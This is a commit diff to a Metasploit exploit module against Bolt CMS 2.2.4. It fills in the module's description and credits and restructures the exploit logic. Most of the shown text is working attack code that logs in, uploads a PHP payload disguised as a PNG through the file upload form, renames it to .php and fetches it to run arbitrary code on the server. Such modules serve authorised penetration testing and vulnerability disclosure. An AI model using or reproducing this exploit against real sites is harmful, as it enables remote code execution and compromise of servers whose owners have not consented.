Add some improvements

Author: espreto

modules/exploits/unix/webapp/bolt_file_upload.rb

@@ -14,19 +14,21 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(
       info,
-      'Name'            => 'Bolt File Upload',
+      'Name'            => 'CMS Bolt File Upload Vulnerability',
       'Description'     => %q{
-          To do.
+          Bolt CMS contains a flaw that allows a authenticated remote
+          attacker to execute arbitrary PHP code. This module was
+          tested on version 2.2.4.
         },
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'To do', # Vulnerability Disclosure
+          'Tim Coen', # Vulnerability Disclosure
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
         ],
       'References'      =>
         [
-          ['URL', 'http://todo.com']
+          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
         ],
       'DisclosureDate'  => 'Aug 17 2015',
       'Platform'        => 'php',
@@ -133,24 +135,24 @@ def exploit
       print_error("#{peer} - Failed to authenticate with Bolt")
       return
     end
-    vprint_good("#{peer} - Authenticated with Bolt")
+    vprint_good("#{peer} - Authenticated with Bolt.")
 
     token = get_token(cookie)
     if nonce.nil?
-      print_error("#{peer} - No nonce")
+      print_error("#{peer} - No token found.")
       return
     end
-    vprint_good("#{peer} - Token #{token} found.")
+    vprint_good("#{peer} - Token \"#{token}\" found.")
 
-        vprint_status("#{peer} - Preparing payload...")
+    vprint_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha_lower(10)
 
     data = Rex::MIME::Message.new
     data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
     data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
     post_data = data.to_s
 
-    print_status("#{peer} - Uploading payload...")
+    vprint_status("#{peer} - Uploading payload...")
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri, 'bolt', 'bolt', 'files', 'theme', 'base-2014'),
@@ -161,28 +163,31 @@ def exploit
 
     unless res
       print_error("#{peer} - No response from the target")
+      return
     end
 
     if res.code == 304
-      print_good("#{peer} - Uploaded the payload")
-    end
-
-    rename = rename_payload(cookie, payload_name)
-    if rename.nil?
-      vprint_error("#{peer} - No renamed filename")
-      return
+      vprint_good("#{peer} - Uploaded the payload")
+
+      rename = rename_payload(cookie, payload_name)
+      if rename.nil?
+        vprint_error("#{peer} - No renamed filename")
+        return
+      end
+
+      php_file_name = "#{payload_name}.php"
+      payload_url = normalize_uri(target_uri.path, 'bolt', 'theme', 'base-2014', php_file_name)
+      vprint_good("#{peer} - Parsed response")
+
+      register_files_for_cleanup(php_file_name)
+      vprint_status("#{peer} - Executing the payload at #{payload_url}")
+      send_request_cgi(
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      )
+      vprint_good("#{peer} - Executed payload")
+    else
+      print_error("#{peer} - To do")
     end
-
-    php_file_name = "#{payload_name}.php"
-    payload_url = normalize_uri(target_uri.path, 'bolt', 'theme', 'base-2014', php_file_name)
-    vprint_good("#{peer} - Parsed response")
-
-    register_files_for_cleanup(php_file_name)
-    vprint_status("#{peer} - Executing the payload at #{payload_url}")
-    send_request_cgi(
-      'uri'     => payload_url,
-      'method'  => 'GET'
-    )
-    vprint_good("#{peer} - Executed payload")
   end
 end